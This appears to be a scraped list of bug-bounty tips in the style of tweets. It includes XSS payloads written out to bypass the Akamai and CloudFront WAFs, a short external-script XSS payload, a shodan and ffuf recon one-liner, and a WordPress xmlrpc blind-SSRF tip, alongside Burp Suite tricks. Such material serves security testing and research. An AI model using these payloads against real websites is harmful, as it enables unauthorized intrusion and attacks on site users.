This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...

In this video we go over what deeplinks are and ways they can be exploited. PoC examples and example reports are also reviewed.

Messed around a bit more since I needed to load in a script for CSP bypass as well and somehow this bypasses Akamai <SCr%00Ipt>confirm`1`</scR%00ipt> (can load scripts with src as well) 🤔 #bugbountytips #bugbountytip

Three effective ways how you can use Match & Replace in Burp Proxy. Trick by @igc_iv #BugBountyTip #BurpSuite #Web

You suffer from Firefox telemetry requests in Burp, don't you? Here is the solution — use this config file for Firefox: gist.github.com/AetherEternity… It disables most of telemetry features. Trick by @AetherEternity #BugBountyTip

CloudFront bypass: Worked on a public program today ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'> Would be interested to know if this is target specific or other CloudFront websites are vulnerable #bugbountytip…

w3af: web application attack and audit framework, the open source web vulnerability scanner. - andresriancho/w3af

shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do ffuf -u http://$host/FUZZ -mc 200 -w spring-boot.txt ;done #bugbountytips #bugbountytip

If you find the host hosting the WordPress CMS, then try to see, if xmlrpc.php is open

Then, through the PingBack function, you can get Blind SSRF)

#bugbounty #hackerone #bugbountytip #bugbountytips

Testing for XSS via “javascript:” but it’s blocked by a WAF? Try these bypasses. Thanks for the #BugBountyTip, @SecurityMB! #BugBountyTips #HackWithIntigriti

an XSS payload with script src for short length inputs <script src=//⑮.₨></script> #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking